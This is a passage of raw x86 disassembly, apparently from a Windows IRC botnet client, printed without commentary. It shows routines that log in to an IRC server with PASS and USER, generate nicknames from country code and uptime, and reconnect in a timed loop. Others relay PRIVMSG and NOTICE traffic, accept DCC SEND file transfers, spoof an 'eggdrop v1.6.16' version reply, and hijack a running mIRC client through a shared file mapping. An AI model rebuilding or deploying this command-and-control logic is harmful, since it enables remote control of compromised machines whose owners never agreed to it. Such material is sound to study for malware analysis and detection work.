call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40CF71: ; CODE XREF: sub_40CF2F+2F�j
cmp [ebp+arg_8], 0
jz short loc_40CF88
push [ebp+arg_8]
push offset byte_41E7A8
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40CF99
; ---------------------------------------------------------------------------
loc_40CF88: ; CODE XREF: sub_40CF2F+46�j
push offset byte_41DEC0
push offset byte_41E7A8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40CF99: ; CODE XREF: sub_40CF2F+57�j
jmp loc_40D020
; ---------------------------------------------------------------------------
loc_40CF9E: ; CODE XREF: sub_40CF2F+9�j
and [ebp+var_4], 0
jmp short loc_40CFAB
; ---------------------------------------------------------------------------
loc_40CFA4: ; CODE XREF: sub_40CF2F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40CFAB: ; CODE XREF: sub_40CF2F+73�j
mov eax, [ebp+var_4]
imul eax, 0Ch
cmp off_41DAD8[eax], 0
jz short loc_40CFBC
jmp short loc_40CFA4
; ---------------------------------------------------------------------------
loc_40CFBC: ; CODE XREF: sub_40CF2F+89�j
call sub_410422
xor edx, edx
div [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DAD8[eax]
push offset dword_41E928
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DADC[eax]
push offset dword_41EA28
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
cmp dword_41DAE0[eax], 0
jz short loc_40D020
mov eax, [ebp+var_8]
imul eax, 0Ch
push dword_41DAE0[eax]
push offset byte_41E7A8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D020: ; CODE XREF: sub_40CF2F:loc_40CF99�j
; sub_40CF2F+D7�j
push offset dword_41E928
call sub_4105AD
pop ecx
push offset dword_41EA28
call sub_4105AD
pop ecx
push offset byte_41E7A8
call sub_4105AD
pop ecx
leave
retn
sub_40CF2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D043 proc near ; CODE XREF: sub_40D366+7F�p
; sub_40D871+619�p
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
var_184 = byte ptr -184h
var_104 = byte ptr -104h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push edi
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_80]
push eax
call sub_40668F
add esp, 0Ch
movsx eax, byte_41E7A8
test eax, eax
jz short loc_40D099
push offset byte_41E7A8
call sub_4105FB
pop ecx
push offset byte_41E7A8
push offset aPassS ; "PASS %s"
call sub_40D6CB
pop ecx
pop ecx
push offset byte_41E7A8
call sub_4105AD
pop ecx
loc_40D099: ; CODE XREF: sub_40D043+2D�j
cmp [ebp+arg_0], 0
jz loc_40D132
movsx eax, byte_41EF58
test eax, eax
jz short loc_40D0C3
push offset byte_41EF58
lea eax, [ebp+var_184]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40D0D6
; ---------------------------------------------------------------------------
loc_40D0C3: ; CODE XREF: sub_40D043+69�j
lea eax, [ebp+var_184]
push eax
push offset byte_41EF58
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D0D6: ; CODE XREF: sub_40D043+7E�j
movsx eax, byte_41F0D8
test eax, eax
jz short loc_40D0F6
push offset byte_41F0D8
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40D109
; ---------------------------------------------------------------------------
loc_40D0F6: ; CODE XREF: sub_40D043+9C�j
lea eax, [ebp+var_104]
push eax
push offset byte_41F0D8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D109: ; CODE XREF: sub_40D043+B1�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
push offset aUserSSSS ; "USER %s %s %s :%s"
call sub_40D6CB
add esp, 14h
loc_40D132: ; CODE XREF: sub_40D043+5A�j
cmp [ebp+arg_4], 0
jz loc_40D363
cmp [ebp+arg_0], 0
jz short loc_40D163
movsx eax, byte_41EED8
test eax, eax
jz short loc_40D163
push offset byte_41EED8
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40D363
; ---------------------------------------------------------------------------
loc_40D163: ; CODE XREF: sub_40D043+FD�j
; sub_40D043+108�j
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_188], eax
cmp [ebp+var_188], 4
jnb short loc_40D18D
call sub_406AE7
test eax, eax
jz loc_40D31F
loc_40D18D: ; CODE XREF: sub_40D043+13B�j
call sub_406A23
lea eax, [ebp+var_24C]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40D1B6
push offset aUnk ; "UNK"
lea eax, [ebp+var_24C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D1B6: ; CODE XREF: sub_40D043+15E�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40D1CF
call sub_408E8E
mov [ebp+var_250], eax
jmp short loc_40D1D9
; ---------------------------------------------------------------------------
loc_40D1CF: ; CODE XREF: sub_40D043+17D�j
mov [ebp+var_250], 400h
loc_40D1D9: ; CODE XREF: sub_40D043+18A�j
mov eax, [ebp+var_250]
shr eax, 0Ah
mov [ebp+var_228], eax
call sub_408887
mov [ebp+var_18C], eax
mov [ebp+var_224], offset aB ; "B"
cmp [ebp+var_18C], 2EEh
jnb short loc_40D213
mov [ebp+var_224], offset aA ; "A"
loc_40D213: ; CODE XREF: sub_40D043+1C4�j
cmp [ebp+var_18C], 1F4h
jnb short loc_40D229
mov [ebp+var_224], offset aG ; "G"
loc_40D229: ; CODE XREF: sub_40D043+1DA�j
and [ebp+var_22C], 0
mov [ebp+var_220], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_21C]
rep stosd
lea eax, [ebp+var_220]
push eax
call dword_417030 ; GetVersionExA
cmp [ebp+var_21C], 5
jnz short loc_40D270
cmp [ebp+var_218], 1
jnz short loc_40D270
mov [ebp+var_22C], 1
loc_40D270: ; CODE XREF: sub_40D043+218�j
; sub_40D043+221�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_22C], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_224]
push [ebp+var_228]
push 5Dh
push [ebp+var_188]
push 5Bh
push 5Dh
lea eax, [ebp+var_24C]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_80]
push eax
call sub_416B5E ; sprintf
add esp, 34h
movsx eax, byte_41DBBC
test eax, eax
jz short loc_40D31D
push offset byte_41DBBC
push offset dword_41DB3C
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41DB3C
call sub_4105FB
pop ecx
movsx eax, byte_41DC3C
test eax, eax
jz short loc_40D31D
push offset byte_41DC3C
push offset dword_41EDD8
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41EDD8
call sub_4105FB
pop ecx
loc_40D31D: ; CODE XREF: sub_40D043+295�j
; sub_40D043+2BC�j
jmp short loc_40D343
; ---------------------------------------------------------------------------
loc_40D31F: ; CODE XREF: sub_40D043+144�j
push offset dword_41DB2C
lea eax, [ebp+var_80]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_40D7E5
pop ecx
loc_40D343: ; CODE XREF: sub_40D043:loc_40D31D�j
lea eax, [ebp+var_80]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
push offset byte_41EED8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D363: ; CODE XREF: sub_40D043+F3�j
; sub_40D043+11B�j
pop edi
leave
retn
sub_40D043 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D366 proc near ; CODE XREF: sub_40A9CF+1521�p
; sub_40D871+4A7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CF2F
add esp, 0Ch
push dword_41EA34
call sub_40538D
pop ecx
mov [ebp+var_4], 0EA60h
loc_40D38E: ; CODE XREF: sub_40D366:loc_40D419�j
push offset dword_41E928
call sub_4105FB
pop ecx
push offset dword_41EA28
call sub_4105FB
pop ecx
push 2710h
push 1
push offset dword_41EA28
push offset dword_41E928
call sub_4050EA
add esp, 10h
mov dword_41EA34, eax
push offset dword_41E928
call sub_4105AD
pop ecx
push offset dword_41EA28
call sub_4105AD
pop ecx
cmp dword_41EA34, 0
jz short loc_40D3EE
push 1
push 1
call sub_40D043
pop ecx
pop ecx
jmp short locret_40D41E
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40D366+79�j
push 0
push 0
push 0
call sub_40CF2F
add esp, 0Ch
push [ebp+var_4]
call dword_41709C ; Sleep
cmp [ebp+var_4], 0A4CB80h
jge short loc_40D419
mov eax, [ebp+var_4]
add eax, 0EA60h
mov [ebp+var_4], eax
loc_40D419: ; CODE XREF: sub_40D366+A6�j
jmp loc_40D38E
; ---------------------------------------------------------------------------
locret_40D41E: ; CODE XREF: sub_40D366+86�j
leave
retn
sub_40D366 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: sub_4020C2:loc_4022A0�p
; sub_40A9CF+1219�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_41EA34
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4AB proc near ; CODE XREF: sub_4020C2+21B�p
; sub_40332B+1A6�p ...
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1004]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_1008], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_1008]
push eax
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push dword_41EA34
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D4AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D53F proc near ; CODE XREF: sub_401244+51�p
; sub_401244+41E�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_40D55F
jmp locret_40D6C9
; ---------------------------------------------------------------------------
loc_40D55F: ; CODE XREF: sub_40D53F+19�j
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 1
jnz short loc_40D58F
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D58F: ; CODE XREF: sub_40D53F+2E�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jnz short loc_40D5BB
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A058
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5BB: ; CODE XREF: sub_40D53F+5A�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D5E7
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A048
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5E7: ; CODE XREF: sub_40D53F+86�j
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
loc_40D605: ; CODE XREF: sub_40D53F+4E�j
; sub_40D53F+7A�j ...
mov eax, [ebp+arg_0]
cmp dword ptr [eax+19Fh], 0
jz short loc_40D63C
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D629
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D63C
loc_40D629: ; CODE XREF: sub_40D53F+DC�j
push offset dword_41A03C
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
loc_40D63C: ; CODE XREF: sub_40D53F+D0�j
; sub_40D53F+E8�j
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D680
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D693
loc_40D680: ; CODE XREF: sub_40D53F+133�j
push offset dword_41A038
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
loc_40D693: ; CODE XREF: sub_40D53F+13F�j
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_41EA34
call sub_4053BF
add esp, 0Ch
locret_40D6C9: ; CODE XREF: sub_40D53F+1B�j
leave
retn
sub_40D53F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6CB proc near ; CODE XREF: sub_40332B+205�p
; sub_40332B+212�p ...
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004h
call sub_416BC0
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push 1000h
lea eax, [ebp+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push dword_41EA34
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D6CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D734 proc near ; CODE XREF: sub_40D74D:loc_40D75E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push offset aMirc ; "mIRC"
call dword_4171E8 ; FindWindowA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_40D734 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D74D proc near ; CODE XREF: sub_40A9CF+926�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jnz short loc_40D75E
jmp locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D75E: ; CODE XREF: sub_40D74D+A�j
call sub_40D734
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40D76E
jmp short locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D76E: ; CODE XREF: sub_40D74D+1D�j
push offset aMirc ; "mIRC"
push 1000h
push 0
push 4
push 0
push 0FFFFFFFFh
call dword_4170C0 ; CreateFileMappingA
mov [ebp+var_8], eax
push 0
push 0
push 0
push 0F001Fh
push [ebp+var_8]
call dword_4170BC ; MapViewOfFile
mov [ebp+var_C], eax
push [ebp+arg_0]
push [ebp+var_C]
call sub_416B5E ; sprintf
pop ecx
pop ecx
push 0
push 1
push 4C8h
push [ebp+var_4]
call dword_4171EC ; SendMessageA
push 0
push 1
push 4C9h
push [ebp+var_4]
call dword_4171EC ; SendMessageA
push [ebp+var_C]
call dword_4170B8 ; UnmapViewOfFile
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
locret_40D7E3: ; CODE XREF: sub_40D74D+C�j
; sub_40D74D+1F�j
leave
retn
sub_40D74D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40A9CF+E3�p
; sub_40D043+2FA�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40D803
; ---------------------------------------------------------------------------
loc_40D7FC: ; CODE XREF: sub_40D7E5:loc_40D86D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40D803: ; CODE XREF: sub_40D7E5+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short locret_40D86F
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40D82E
push 39h
push 30h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D82E: ; CODE XREF: sub_40D7E5+32�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40D86D
call sub_410483
test eax, eax
jz short loc_40D85A
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D85A: ; CODE XREF: sub_40D7E5+5E�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
loc_40D86D: ; CODE XREF: sub_40D7E5+47�j
; sub_40D7E5+55�j ...
jmp short loc_40D7FC
; ---------------------------------------------------------------------------
locret_40D86F: ; CODE XREF: sub_40D7E5+24�j
leave
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D871 proc near ; CODE XREF: sub_40E618+321�p
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_7D8 = dword ptr -7D8h
var_7D4 = dword ptr -7D4h
var_7D0 = dword ptr -7D0h
var_7CC = dword ptr -7CCh
var_7C8 = dword ptr -7C8h
var_7C4 = byte ptr -7C4h
var_7C0 = dword ptr -7C0h
var_7BC = byte ptr -7BCh
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_4B4 = byte ptr -4B4h
var_490 = byte ptr -490h
var_390 = byte ptr -390h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35C = dword ptr -35Ch
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_238 = dword ptr -238h
var_234 = byte ptr -234h
var_213 = byte ptr -213h
var_113 = dword ptr -113h
var_10F = byte ptr -10Fh
var_95 = dword ptr -95h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 7E8h
push edi
push offset aPing ; "PING"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8A7
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
push offset aPongS ; "PONG %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8A7: ; CODE XREF: sub_40D871+1D�j
push offset aPong ; "PONG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8C2
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8C2: ; CODE XREF: sub_40D871+4A�j
push offset aMode ; "MODE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8DD
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8DD: ; CODE XREF: sub_40D871+65�j
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DB2D
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz loc_40DB2D
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax+1]
cmp eax, 1
jnz loc_40DB2D
push offset dword_41A14C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jz loc_40DA81
push offset aSend ; "SEND"
mov eax, [ebp+arg_C]
push dword ptr [eax+10h]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
cmp [ebp+arg_0], 0
jz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+14h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+18h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+1Ch], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+20h], 0
jnz short loc_40D98B
loc_40D986: ; CODE XREF: sub_40D871+F8�j
; sub_40D871+101�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D98B: ; CODE XREF: sub_40D871+113�j
mov eax, [ebp+arg_C]
mov eax, [eax+14h]
movsx eax, byte ptr [eax]
cmp eax, 22h
jnz short loc_40D99E
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D99E: ; CODE XREF: sub_40D871+126�j
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+20h]
and byte ptr [ecx+eax], 0
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41DB3C
lea eax, [ebp+var_213]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
and [ebp+var_113], 0
push 7Ah
push 0
lea eax, [ebp+var_10F]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_95], 1
mov eax, [ebp+arg_C]
push dword ptr [eax+18h]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_238], eax
movzx eax, byte ptr [ebp+var_238]
push eax
mov eax, [ebp+var_238]
shr eax, 8
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 10h
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 18h
movzx eax, al
push eax
push offset dword_418A50
lea eax, [ebp+var_248]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
mov eax, [ebp+arg_C]
push dword ptr [eax+1Ch]
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax+14h]
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_4024F3
add esp, 18h
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DA81: ; CODE XREF: sub_40D871+BA�j
; sub_40D871+C7�j ...
push offset dword_41A138
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DAAD
push offset dword_41A12C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DAEB
loc_40DAAD: ; CODE XREF: sub_40D871+224�j
cmp [ebp+arg_0], 0
jz short loc_40DAD1
push offset dword_41DCBC
push 3B7h
push 0
push offset dword_41A108
push [ebp+arg_4]
call sub_40D420
add esp, 14h
jmp short loc_40DAE6
; ---------------------------------------------------------------------------
loc_40DAD1: ; CODE XREF: sub_40D871+240�j
push offset aEggdropV1_6_16 ; "eggdrop v1.6.16"
push offset dword_41A0E8
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
loc_40DAE6: ; CODE XREF: sub_40D871+25E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DAEB: ; CODE XREF: sub_40D871+23A�j
push offset dword_41A0E0
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DB16
push offset dword_41A0D8
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call dword_417108 ; lstrcmpA
test eax, eax
jnz short loc_40DB2D
loc_40DB16: ; CODE XREF: sub_40D871+28E�j
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
push eax
push [ebp+arg_4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DB2D: ; CODE XREF: sub_40D871+80�j
; sub_40D871+8D�j ...
push offset a433 ; "433"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DCFD
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_2CC], eax
cmp [ebp+var_2CC], 4
jnb short loc_40DB71
call sub_406AE7
test eax, eax
jz loc_40DCB8
loc_40DB71: ; CODE XREF: sub_40D871+2F1�j
call sub_406A23
lea eax, [ebp+var_390]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40DB9A
push offset aUnk ; "UNK"
lea eax, [ebp+var_390]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40DB9A: ; CODE XREF: sub_40D871+314�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40DBB3
call sub_408E8E
mov [ebp+var_7E4], eax
jmp short loc_40DBBD
; ---------------------------------------------------------------------------
loc_40DBB3: ; CODE XREF: sub_40D871+333�j
mov [ebp+var_7E4], 400h
